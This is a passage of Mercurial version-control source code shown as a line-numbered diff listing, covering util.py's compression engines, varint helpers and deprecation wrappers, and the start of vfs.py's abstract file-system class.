3271 3269 The integer priorities are used to order the advertisement of format
3272 3270 support by server and client. The highest integer is advertised
3273 3271 first. Integers with non-positive values aren't advertised.
3274 3272
3275 3273 The priority values are somewhat arbitrary and only used for default
3276 3274 ordering. The relative order can be changed via config options.
3277 3275
3278 3276 If wire protocol compression is supported, the class must also implement
3279 3277 ``compressstream`` and ``decompressorreader``.
3280 3278 """
3281 3279 return None
3282 3280
3283 3281 def revlogheader(self):
3284 3282 """Header added to revlog chunks that identifies this engine.
3285 3283
3286 3284 If this engine can be used to compress revlogs, this method should
3287 3285 return the bytes used to identify chunks compressed with this engine.
3288 3286 Else, the method should return ``None`` to indicate it does not
3289 3287 participate in revlog compression.
3290 3288 """
3291 3289 return None
3292 3290
3293 3291 def compressstream(self, it, opts=None):
3294 3292 """Compress an iterator of chunks.
3295 3293
3296 3294 The method receives an iterator (ideally a generator) of chunks of
3297 3295 bytes to be compressed. It returns an iterator (ideally a generator)
3298 3296 of bytes of chunks representing the compressed output.
3299 3297
3300 3298 Optionally accepts an argument defining how to perform compression.
3301 3299 Each engine treats this argument differently.
3302 3300 """
3303 3301 raise NotImplementedError()
3304 3302
3305 3303 def decompressorreader(self, fh):
3306 3304 """Perform decompression on a file object.
3307 3305
3308 3306 Argument is an object with a ``read(size)`` method that returns
3309 3307 compressed data. Return value is an object with a ``read(size)`` that
3310 3308 returns uncompressed data.
3311 3309 """
3312 3310 raise NotImplementedError()
3313 3311
3314 3312 def revlogcompressor(self, opts=None):
3315 3313 """Obtain an object that can be used to compress revlog entries.
3316 3314
3317 3315 The object has a ``compress(data)`` method that compresses binary
3318 3316 data. This method returns compressed binary data or ``None`` if
3319 3317 the data could not be compressed (too small, not compressible, etc).
3320 3318 The returned data should have a header uniquely identifying this
3321 3319 compression format so decompression can be routed to this engine.
3322 3320 This header should be identified by the ``revlogheader()`` return
3323 3321 value.
3324 3322
3325 3323 The object has a ``decompress(data)`` method that decompresses
3326 3324 data. The method will only be called if ``data`` begins with
3327 3325 ``revlogheader()``. The method should return the raw, uncompressed
3328 3326 data or raise a ``RevlogError``.
3329 3327
3330 3328 The object is reusable but is not thread safe.
3331 3329 """
3332 3330 raise NotImplementedError()
3333 3331
3334 3332 class _zlibengine(compressionengine):
3335 3333 def name(self):
3336 3334 return 'zlib'
3337 3335
3338 3336 def bundletype(self):
3339 3337 """zlib compression using the DEFLATE algorithm.
3340 3338
3341 3339 All Mercurial clients should support this format. The compression
3342 3340 algorithm strikes a reasonable balance between compression ratio
3343 3341 and size.
3344 3342 """
3345 3343 return 'gzip', 'GZ'
3346 3344
3347 3345 def wireprotosupport(self):
3348 3346 return compewireprotosupport('zlib', 20, 20)
3349 3347
3350 3348 def revlogheader(self):
3351 3349 return 'x'
3352 3350
3353 3351 def compressstream(self, it, opts=None):
3354 3352 opts = opts or {}
3355 3353
3356 3354 z = zlib.compressobj(opts.get('level', -1))
3357 3355 for chunk in it:
3358 3356 data = z.compress(chunk)
3359 3357 # Not all calls to compress emit data. It is cheaper to inspect
3360 3358 # here than to feed empty chunks through generator.
3361 3359 if data:
3362 3360 yield data
3363 3361
3364 3362 yield z.flush()
3365 3363
3366 3364 def decompressorreader(self, fh):
3367 3365 def gen():
3368 3366 d = zlib.decompressobj()
3369 3367 for chunk in filechunkiter(fh):
3370 3368 while chunk:
3371 3369 # Limit output size to limit memory.
3372 3370 yield d.decompress(chunk, 2 ** 18)
3373 3371 chunk = d.unconsumed_tail
3374 3372
3375 3373 return chunkbuffer(gen())
3376 3374
3377 3375 class zlibrevlogcompressor(object):
3378 3376 def compress(self, data):
3379 3377 insize = len(data)
3380 3378 # Caller handles empty input case.
3381 3379 assert insize > 0
3382 3380
3383 3381 if insize < 44:
3384 3382 return None
3385 3383
3386 3384 elif insize <= 1000000:
3387 3385 compressed = zlib.compress(data)
3388 3386 if len(compressed) < insize:
3389 3387 return compressed
3390 3388 return None
3391 3389
3392 3390 # zlib makes an internal copy of the input buffer, doubling
3393 3391 # memory usage for large inputs. So do streaming compression
3394 3392 # on large inputs.
3395 3393 else:
3396 3394 z = zlib.compressobj()
3397 3395 parts = []
3398 3396 pos = 0
3399 3397 while pos < insize:
3400 3398 pos2 = pos + 2**20
3401 3399 parts.append(z.compress(data[pos:pos2]))
3402 3400 pos = pos2
3403 3401 parts.append(z.flush())
3404 3402
3405 3403 if sum(map(len, parts)) < insize:
3406 3404 return ''.join(parts)
3407 3405 return None
3408 3406
3409 3407 def decompress(self, data):
3410 3408 try:
3411 3409 return zlib.decompress(data)
3412 3410 except zlib.error as e:
3413 3411 raise error.RevlogError(_('revlog decompress error: %s') %
3414 3412 stringutil.forcebytestr(e))
3415 3413
3416 3414 def revlogcompressor(self, opts=None):
3417 3415 return self.zlibrevlogcompressor()
3418 3416
3419 3417 compengines.register(_zlibengine())
3420 3418
3421 3419 class _bz2engine(compressionengine):
3422 3420 def name(self):
3423 3421 return 'bz2'
3424 3422
3425 3423 def bundletype(self):
3426 3424 """An algorithm that produces smaller bundles than ``gzip``.
3427 3425
3428 3426 All Mercurial clients should support this format.
3429 3427
3430 3428 This engine will likely produce smaller bundles than ``gzip`` but
3431 3429 will be significantly slower, both during compression and
3432 3430 decompression.
3433 3431
3434 3432 If available, the ``zstd`` engine can yield similar or better
3435 3433 compression at much higher speeds.
3436 3434 """
3437 3435 return 'bzip2', 'BZ'
3438 3436
3439 3437 # We declare a protocol name but don't advertise by default because
3440 3438 # it is slow.
3441 3439 def wireprotosupport(self):
3442 3440 return compewireprotosupport('bzip2', 0, 0)
3443 3441
3444 3442 def compressstream(self, it, opts=None):
3445 3443 opts = opts or {}
3446 3444 z = bz2.BZ2Compressor(opts.get('level', 9))
3447 3445 for chunk in it:
3448 3446 data = z.compress(chunk)
3449 3447 if data:
3450 3448 yield data
3451 3449
3452 3450 yield z.flush()
3453 3451
3454 3452 def decompressorreader(self, fh):
3455 3453 def gen():
3456 3454 d = bz2.BZ2Decompressor()
3457 3455 for chunk in filechunkiter(fh):
3458 3456 yield d.decompress(chunk)
3459 3457
3460 3458 return chunkbuffer(gen())
3461 3459
3462 3460 compengines.register(_bz2engine())
3463 3461
3464 3462 class _truncatedbz2engine(compressionengine):
3465 3463 def name(self):
3466 3464 return 'bz2truncated'
3467 3465
3468 3466 def bundletype(self):
3469 3467 return None, '_truncatedBZ'
3470 3468
3471 3469 # We don't implement compressstream because it is hackily handled elsewhere.
3472 3470
3473 3471 def decompressorreader(self, fh):
3474 3472 def gen():
3475 3473 # The input stream doesn't have the 'BZ' header. So add it back.
3476 3474 d = bz2.BZ2Decompressor()
3477 3475 d.decompress('BZ')
3478 3476 for chunk in filechunkiter(fh):
3479 3477 yield d.decompress(chunk)
3480 3478
3481 3479 return chunkbuffer(gen())
3482 3480
3483 3481 compengines.register(_truncatedbz2engine())
3484 3482
3485 3483 class _noopengine(compressionengine):
3486 3484 def name(self):
3487 3485 return 'none'
3488 3486
3489 3487 def bundletype(self):
3490 3488 """No compression is performed.
3491 3489
3492 3490 Use this compression engine to explicitly disable compression.
3493 3491 """
3494 3492 return 'none', 'UN'
3495 3493
3496 3494 # Clients always support uncompressed payloads. Servers don't because
3497 3495 # unless you are on a fast network, uncompressed payloads can easily
3498 3496 # saturate your network pipe.
3499 3497 def wireprotosupport(self):
3500 3498 return compewireprotosupport('none', 0, 10)
3501 3499
3502 3500 # We don't implement revlogheader because it is handled specially
3503 3501 # in the revlog class.
3504 3502
3505 3503 def compressstream(self, it, opts=None):
3506 3504 return it
3507 3505
3508 3506 def decompressorreader(self, fh):
3509 3507 return fh
3510 3508
3511 3509 class nooprevlogcompressor(object):
3512 3510 def compress(self, data):
3513 3511 return None
3514 3512
3515 3513 def revlogcompressor(self, opts=None):
3516 3514 return self.nooprevlogcompressor()
3517 3515
3518 3516 compengines.register(_noopengine())
3519 3517
3520 3518 class _zstdengine(compressionengine):
3521 3519 def name(self):
3522 3520 return 'zstd'
3523 3521
3524 3522 @propertycache
3525 3523 def _module(self):
3526 3524 # Not all installs have the zstd module available. So defer importing
3527 3525 # until first access.
3528 3526 try:
3529 3527 from . import zstd
3530 3528 # Force delayed import.
3531 3529 zstd.__version__
3532 3530 return zstd
3533 3531 except ImportError:
3534 3532 return None
3535 3533
3536 3534 def available(self):
3537 3535 return bool(self._module)
3538 3536
3539 3537 def bundletype(self):
3540 3538 """A modern compression algorithm that is fast and highly flexible.
3541 3539
3542 3540 Only supported by Mercurial 4.1 and newer clients.
3543 3541
3544 3542 With the default settings, zstd compression is both faster and yields
3545 3543 better compression than ``gzip``. It also frequently yields better
3546 3544 compression than ``bzip2`` while operating at much higher speeds.
3547 3545
3548 3546 If this engine is available and backwards compatibility is not a
3549 3547 concern, it is likely the best available engine.
3550 3548 """
3551 3549 return 'zstd', 'ZS'
3552 3550
3553 3551 def wireprotosupport(self):
3554 3552 return compewireprotosupport('zstd', 50, 50)
3555 3553
3556 3554 def revlogheader(self):
3557 3555 return '\x28'
3558 3556
3559 3557 def compressstream(self, it, opts=None):
3560 3558 opts = opts or {}
3561 3559 # zstd level 3 is almost always significantly faster than zlib
3562 3560 # while providing no worse compression. It strikes a good balance
3563 3561 # between speed and compression.
3564 3562 level = opts.get('level', 3)
3565 3563
3566 3564 zstd = self._module
3567 3565 z = zstd.ZstdCompressor(level=level).compressobj()
3568 3566 for chunk in it:
3569 3567 data = z.compress(chunk)
3570 3568 if data:
3571 3569 yield data
3572 3570
3573 3571 yield z.flush()
3574 3572
3575 3573 def decompressorreader(self, fh):
3576 3574 zstd = self._module
3577 3575 dctx = zstd.ZstdDecompressor()
3578 3576 return chunkbuffer(dctx.read_from(fh))
3579 3577
3580 3578 class zstdrevlogcompressor(object):
3581 3579 def __init__(self, zstd, level=3):
3582 3580 # TODO consider omitting frame magic to save 4 bytes.
3583 3581 # This writes content sizes into the frame header. That is
3584 3582 # extra storage. But it allows a correct size memory allocation
3585 3583 # to hold the result.
3586 3584 self._cctx = zstd.ZstdCompressor(level=level)
3587 3585 self._dctx = zstd.ZstdDecompressor()
3588 3586 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3589 3587 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3590 3588
3591 3589 def compress(self, data):
3592 3590 insize = len(data)
3593 3591 # Caller handles empty input case.
3594 3592 assert insize > 0
3595 3593
3596 3594 if insize < 50:
3597 3595 return None
3598 3596
3599 3597 elif insize <= 1000000:
3600 3598 compressed = self._cctx.compress(data)
3601 3599 if len(compressed) < insize:
3602 3600 return compressed
3603 3601 return None
3604 3602 else:
3605 3603 z = self._cctx.compressobj()
3606 3604 chunks = []
3607 3605 pos = 0
3608 3606 while pos < insize:
3609 3607 pos2 = pos + self._compinsize
3610 3608 chunk = z.compress(data[pos:pos2])
3611 3609 if chunk:
3612 3610 chunks.append(chunk)
3613 3611 pos = pos2
3614 3612 chunks.append(z.flush())
3615 3613
3616 3614 if sum(map(len, chunks)) < insize:
3617 3615 return ''.join(chunks)
3618 3616 return None
3619 3617
3620 3618 def decompress(self, data):
3621 3619 insize = len(data)
3622 3620
3623 3621 try:
3624 3622 # This was measured to be faster than other streaming
3625 3623 # decompressors.
3626 3624 dobj = self._dctx.decompressobj()
3627 3625 chunks = []
3628 3626 pos = 0
3629 3627 while pos < insize:
3630 3628 pos2 = pos + self._decompinsize
3631 3629 chunk = dobj.decompress(data[pos:pos2])
3632 3630 if chunk:
3633 3631 chunks.append(chunk)
3634 3632 pos = pos2
3635 3633 # Frame should be exhausted, so no finish() API.
3636 3634
3637 3635 return ''.join(chunks)
3638 3636 except Exception as e:
3639 3637 raise error.RevlogError(_('revlog decompress error: %s') %
3640 3638 stringutil.forcebytestr(e))
3641 3639
3642 3640 def revlogcompressor(self, opts=None):
3643 3641 opts = opts or {}
3644 3642 return self.zstdrevlogcompressor(self._module,
3645 3643 level=opts.get('level', 3))
3646 3644
3647 3645 compengines.register(_zstdengine())
3648 3646
3649 3647 def bundlecompressiontopics():
3650 3648 """Obtains a list of available bundle compressions for use in help."""
3651 3649 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3652 3650 items = {}
3653 3651
3654 3652 # We need to format the docstring. So use a dummy object/type to hold it
3655 3653 # rather than mutating the original.
3656 3654 class docobject(object):
3657 3655 pass
3658 3656
3659 3657 for name in compengines:
3660 3658 engine = compengines[name]
3661 3659
3662 3660 if not engine.available():
3663 3661 continue
3664 3662
3665 3663 bt = engine.bundletype()
3666 3664 if not bt or not bt[0]:
3667 3665 continue
3668 3666
3669 3667 doc = pycompat.sysstr('``%s``\n %s') % (
3670 3668 bt[0], engine.bundletype.__doc__)
3671 3669
3672 3670 value = docobject()
3673 3671 value.__doc__ = doc
3674 3672 value._origdoc = engine.bundletype.__doc__
3675 3673 value._origfunc = engine.bundletype
3676 3674
3677 3675 items[bt[0]] = value
3678 3676
3679 3677 return items
3680 3678
3681 3679 i18nfunctions = bundlecompressiontopics().values()
3682 3680
3683 3681 # convenient shortcut
3684 3682 dst = debugstacktrace
3685 3683
3686 3684 def safename(f, tag, ctx, others=None):
3687 3685 """
3688 3686 Generate a name that it is safe to rename f to in the given context.
3689 3687
3690 3688 f: filename to rename
3691 3689 tag: a string tag that will be included in the new name
3692 3690 ctx: a context, in which the new name must not exist
3693 3691 others: a set of other filenames that the new name must not be in
3694 3692
3695 3693 Returns a file name of the form oldname~tag[~number] which does not exist
3696 3694 in the provided context and is not in the set of other names.
3697 3695 """
3698 3696 if others is None:
3699 3697 others = set()
3700 3698
3701 3699 fn = '%s~%s' % (f, tag)
3702 3700 if fn not in ctx and fn not in others:
3703 3701 return fn
3704 3702 for n in itertools.count(1):
3705 3703 fn = '%s~%s~%s' % (f, tag, n)
3706 3704 if fn not in ctx and fn not in others:
3707 3705 return fn
3708 3706
3709 3707 def readexactly(stream, n):
3710 3708 '''read n bytes from stream.read and abort if less was available'''
3711 3709 s = stream.read(n)
3712 3710 if len(s) < n:
3713 3711 raise error.Abort(_("stream ended unexpectedly"
3714 3712 " (got %d bytes, expected %d)")
3715 3713 % (len(s), n))
3716 3714 return s
3717 3715
3718 3716 def uvarintencode(value):
3719 3717 """Encode an unsigned integer value to a varint.
3720 3718
3721 3719 A varint is a variable length integer of 1 or more bytes. Each byte
3722 3720 except the last has the most significant bit set. The lower 7 bits of
3723 3721 each byte store the 2's complement representation, least significant group
3724 3722 first.
3725 3723
3726 3724 >>> uvarintencode(0)
3727 3725 '\\x00'
3728 3726 >>> uvarintencode(1)
3729 3727 '\\x01'
3730 3728 >>> uvarintencode(127)
3731 3729 '\\x7f'
3732 3730 >>> uvarintencode(1337)
3733 3731 '\\xb9\\n'
3734 3732 >>> uvarintencode(65536)
3735 3733 '\\x80\\x80\\x04'
3736 3734 >>> uvarintencode(-1)
3737 3735 Traceback (most recent call last):
3738 3736 ...
3739 3737 ProgrammingError: negative value for uvarint: -1
3740 3738 """
3741 3739 if value < 0:
3742 3740 raise error.ProgrammingError('negative value for uvarint: %d'
3743 3741 % value)
3744 3742 bits = value & 0x7f
3745 3743 value >>= 7
3746 3744 bytes = []
3747 3745 while value:
3748 3746 bytes.append(pycompat.bytechr(0x80 | bits))
3749 3747 bits = value & 0x7f
3750 3748 value >>= 7
3751 3749 bytes.append(pycompat.bytechr(bits))
3752 3750
3753 3751 return ''.join(bytes)
3754 3752
3755 3753 def uvarintdecodestream(fh):
3756 3754 """Decode an unsigned variable length integer from a stream.
3757 3755
3758 3756 The passed argument is anything that has a ``.read(N)`` method.
3759 3757
3760 3758 >>> try:
3761 3759 ... from StringIO import StringIO as BytesIO
3762 3760 ... except ImportError:
3763 3761 ... from io import BytesIO
3764 3762 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3765 3763 0
3766 3764 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3767 3765 1
3768 3766 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3769 3767 127
3770 3768 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3771 3769 1337
3772 3770 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3773 3771 65536
3774 3772 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3775 3773 Traceback (most recent call last):
3776 3774 ...
3777 3775 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3778 3776 """
3779 3777 result = 0
3780 3778 shift = 0
3781 3779 while True:
3782 3780 byte = ord(readexactly(fh, 1))
3783 3781 result |= ((byte & 0x7f) << shift)
3784 3782 if not (byte & 0x80):
3785 3783 return result
3786 3784 shift += 7
3787 3785
3788 3786 ###
3789 3787 # Deprecation warnings for util.py splitting
3790 3788 ###
3791 3789
3792 3790 def _deprecatedfunc(func, version, modname=None):
3793 3791 def wrapped(*args, **kwargs):
3794 3792 fn = pycompat.sysbytes(func.__name__)
3795 3793 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3796 3794 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3797 3795 nouideprecwarn(msg, version, stacklevel=2)
3798 3796 return func(*args, **kwargs)
3799 3797 wrapped.__name__ = func.__name__
3800 3798 return wrapped
3801 3799
3802 3800 defaultdateformats = dateutil.defaultdateformats
3803 3801 extendeddateformats = dateutil.extendeddateformats
3804 3802 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3805 3803 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3806 3804 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3807 3805 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3808 3806 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3809 3807 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3810 3808 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3811 3809
3812 3810 stderr = procutil.stderr
3813 3811 stdin = procutil.stdin
3814 3812 stdout = procutil.stdout
3815 3813 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3816 3814 modname='utils.procutil')
3817 3815 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3818 3816 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3819 3817 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3820 3818 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3821 3819 modname='utils.procutil')
3822 3820 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3823 3821 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3824 3822 modname='utils.procutil')
3825 3823 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3826 3824 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3827 3825 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3828 3826 modname='utils.procutil')
3829 3827 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3830 3828 modname='utils.procutil')
3831 3829 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3832 3830 modname='utils.procutil')
3833 3831 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3834 3832 modname='utils.procutil')
3835 3833 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3836 3834 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3837 3835 try:
3838 3836 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3839 3837 modname='utils.procutil')
3840 3838 except AttributeError:
3841 3839 pass
3842 3840 try:
3843 3841 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3844 3842 modname='utils.procutil')
3845 3843 except AttributeError:
3846 3844 pass
3847 3845 closefds = procutil.closefds
3848 3846 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3849 3847 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3850 3848 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3851 3849 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3852 3850 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3853 3851 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3854 3852 filter = _deprecatedfunc(procutil.filter, '4.6')
3855 3853 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3856 3854 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3857 3855 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3858 3856 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3859 3857 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3860 3858 system = _deprecatedfunc(procutil.system, '4.6')
3861 3859 gui = _deprecatedfunc(procutil.gui, '4.6')
3862 3860 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3863 3861 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3864 3862
3865 3863 binary = _deprecatedfunc(stringutil.binary, '4.6')
3866 3864 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3867 3865 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3868 3866 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3869 3867 email = _deprecatedfunc(stringutil.email, '4.6')
3870 3868 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3871 3869 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3872 3870 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3873 3871 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3874 3872 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3875 3873 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3876 3874 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
@@ -1,653 +1,653 b''
1 1 # vfs.py - Mercurial 'vfs' classes
2 2 #
3 3 # Copyright Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 from __future__ import absolute_import
8 8
9 9 import contextlib
10 10 import errno
11 11 import os
12 12 import shutil
13 13 import stat
14 14 import tempfile
15 15 import threading
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 encoding,
20 20 error,
21 21 pathutil,
22 22 pycompat,
23 23 util,
24 24 )
25 25
26 26 def _avoidambig(path, oldstat):
27 27 """Avoid file stat ambiguity forcibly
28 28
29 29 This function causes copying ``path`` file, if it is owned by
30 30 another (see issue5418 and issue5584 for detail).
31 31 """
32 32 def checkandavoid():
33 33 newstat = util.filestat.frompath(path)
34 34 # return whether file stat ambiguity is (already) avoided
35 35 return (not newstat.isambig(oldstat) or
36 36 newstat.avoidambig(path, oldstat))
37 37 if not checkandavoid():
38 38 # simply copy to change owner of path to get privilege to
39 39 # advance mtime (see issue5418)
40 40 util.rename(util.mktempcopy(path), path)
41 41 checkandavoid()
42 42
43 43 class abstractvfs(object):
44 44 """Abstract base class; cannot be instantiated"""
45 45
46 46 def __init__(self, *args, **kwargs):
47 47 '''Prevent instantiation; don't call this from subclasses.'''
48 48 raise NotImplementedError('attempted instantiating ' + str(type(self)))
49 49
50 50 def tryread(self, path):
51 51 '''gracefully return an empty string for missing files'''
52 52 try:
53 53 return self.read(path)
54 54 except IOError as inst:
55 55 if inst.errno != errno.ENOENT:
56 56 raise
57 57 return ""
58 58
59 59 def tryreadlines(self, path, mode='rb'):
60 60 '''gracefully return an empty array for missing files'''
61 61 try:
62 62 return self.readlines(path, mode=mode)
63 63 except IOError as inst:
64 64 if inst.errno != errno.ENOENT:
65 65 raise
66 66 return []
67 67
68 68 @util.propertycache
69 69 def open(self):
70 70 '''Open ``path`` file, which is relative to vfs root.
71 71
72 72 Newly created directories are marked as "not to be indexed by
73 73 the content indexing service", if ``notindexed`` is specified
74 74 for "write" mode access.
75 75 '''
76 76 return self.__call__
77 77
78 78 def read(self, path):
79 79 with self(path, 'rb') as fp:
80 80 return fp.read()
81 81
82 82 def readlines(self, path, mode='rb'):
83 83 with self(path, mode=mode) as fp:
84 84 return fp.readlines()
85 85
86 86 def write(self, path, data, backgroundclose=False, **kwargs):
87 87 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
88 88 return fp.write(data)
89 89
90 90 def writelines(self, path, data, mode='wb', notindexed=False):
91 91 with self(path, mode=mode, notindexed=notindexed) as fp:
92 92 return fp.writelines(data)
93 93
94 94 def append(self, path, data):
95 95 with self(path, 'ab') as fp:
96 96 return fp.write(data)
97 97
98 98 def basename(self, path):
99 99 """return base element of a path (as os.path.basename would do)
100 100
101 101 This exists to allow handling of strange encoding if needed."""
102 102 return os.path.basename(path)
103 103
104 104 def chmod(self, path, mode):
105 105 return os.chmod(self.join(path), mode)
106 106
107 107 def dirname(self, path):
108 108 """return dirname element of a path (as os.path.dirname would do)
109 109
110 110 This exists to allow handling of strange encoding if needed."""
111 111 return os.path.dirname(path)
112 112
113 113 def exists(self, path=None):
114 114 return os.path.exists(self.join(path))
115 115
116 116 def fstat(self, fp):
117 117 return util.fstat(fp)
118 118
119 119 def isdir(self, path=None):
120 120 return os.path.isdir(self.join(path))
121 121
122 122 def isfile(self, path=None):
123 123 return os.path.isfile(self.join(path))
124 124
125 125 def islink(self, path=None):
126 126 return os.path.islink(self.join(path))
127 127
128 128 def isfileorlink(self, path=None):
129 129 '''return whether path is a regular file or a symlink
130 130
131 131 Unlike isfile, this doesn't follow symlinks.'''
132 132 try:
133 133 st = self.lstat(path)
134 134 except OSError:
135 135 return False
136 136 mode = st.st_mode
137 137 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
138 138
139 139 def reljoin(self, *paths):
140 140 """join various elements of a path together (as os.path.join would do)
141 141
142 142 The vfs base is not injected so that path stay relative. This exists
143 143 to allow handling of strange encoding if needed."""
144 144 return os.path.join(*paths)
145 145
146 146 def split(self, path):
147 147 """split top-most element of a path (as os.path.split would do)
148 148
149 149 This exists to allow handling of strange encoding if needed."""
150 150 return os.path.split(path)
151 151
152 152 def lexists(self, path=None):
153 153 return os.path.lexists(self.join(path))
154 154
155 155 def lstat(self, path=None):
156 156 return os.lstat(self.join(path))
157 157
158 158 def listdir(self, path=None):
159 159 return os.listdir(self.join(path))
160 160
161 161 def makedir(self, path=None, notindexed=True):
162 162 return util.makedir(self.join(path), notindexed)
163 163
164 164 def makedirs(self, path=None, mode=None):
165 165 return util.makedirs(self.join(path), mode)
166 166
167 167 def makelock(self, info, path):
168 168 return util.makelock(info, self.join(path))
169 169
170 170 def mkdir(self, path=None):
171 171 return os.mkdir(self.join(path))
172 172
173 173 def mkstemp(self, suffix='', prefix='tmp', dir=None):
174 174 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
175 175 dir=self.join(dir))
176 176 dname, fname = util.split(name)
177 177 if dir:
178 178 return fd, os.path.join(dir, fname)
179 179 else:
180 180 return fd, fname
181 181
182 182 def readdir(self, path=None, stat=None, skip=None):
183 183 return util.listdir(self.join(path), stat, skip)
184 184
185 185 def readlock(self, path):
186 186 return util.readlock(self.join(path))
187 187
188 188 def rename(self, src, dst, checkambig=False):
189 189 """Rename from src to dst
190 190
191 191 checkambig argument is used with util.filestat, and is useful
192 192 only if destination file is guarded by any lock
193 193 (e.g. repo.lock or repo.wlock).
194 194
195 195 To avoid file stat ambiguity forcibly, checkambig=True involves
196 196 copying ``src`` file, if it is owned by another. Therefore, use
197 197 checkambig=True only in limited cases (see also issue5418 and
198 198 issue5584 for detail).
199 199 """
200 200 srcpath = self.join(src)
201 201 dstpath = self.join(dst)
202 202 oldstat = checkambig and util.filestat.frompath(dstpath)
203 203 if oldstat and oldstat.stat:
204 204 ret = util.rename(srcpath, dstpath)
205 205 _avoidambig(dstpath, oldstat)
206 206 return ret
207 207 return util.rename(srcpath, dstpath)
208 208
209 209 def readlink(self, path):
210 210 return os.readlink(self.join(path))
211 211
212 212 def removedirs(self, path=None):
213 213 """Remove a leaf directory and all empty intermediate ones
214 214 """
215 215 return util.removedirs(self.join(path))
216 216
217 217 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
218 218 """Remove a directory tree recursively
219 219
220 220 If ``forcibly``, this tries to remove READ-ONLY files, too.
221 221 """
222 222 if forcibly:
223 223 def onerror(function, path, excinfo):
224 224 if function is not os.remove:
225 225 raise
226 226 # read-only files cannot be unlinked under Windows
227 227 s = os.stat(path)
228 228 if (s.st_mode & stat.S_IWRITE) != 0:
229 229 raise
230 230 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
231 231 os.remove(path)
232 232 else:
233 233 onerror = None
234 234 return shutil.rmtree(self.join(path),
235 235 ignore_errors=ignore_errors, onerror=onerror)
236 236
237 237 def setflags(self, path, l, x):
238 238 return util.setflags(self.join(path), l, x)
239 239
240 240 def stat(self, path=None):
241 241 return os.stat(self.join(path))
242 242
243 243 def unlink(self, path=None):
244 244 return util.unlink(self.join(path))
245 245
246 246 def tryunlink(self, path=None):
247 247 """Attempt to remove a file, ignoring missing file errors."""
248 248 util.tryunlink(self.join(path))
249 249
250 250 def unlinkpath(self, path=None, ignoremissing=False):
251 251 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
252 252
253 253 def utime(self, path=None, t=None):
254 254 return os.utime(self.join(path), t)
255 255
256 256 def walk(self, path=None, onerror=None):
257 257 """Yield (dirpath, dirs, files) tuple for each directories under path
258 258
259 259 ``dirpath`` is relative one from the root of this vfs. This
260 260 uses ``os.sep`` as path separator, even you specify POSIX
261 261 style ``path``.
262 262
263 263 "The root of this vfs" is represented as empty ``dirpath``.
264 264 """
265 265 root = os.path.normpath(self.join(None))
266 266 # when dirpath == root, dirpath[prefixlen:] becomes empty
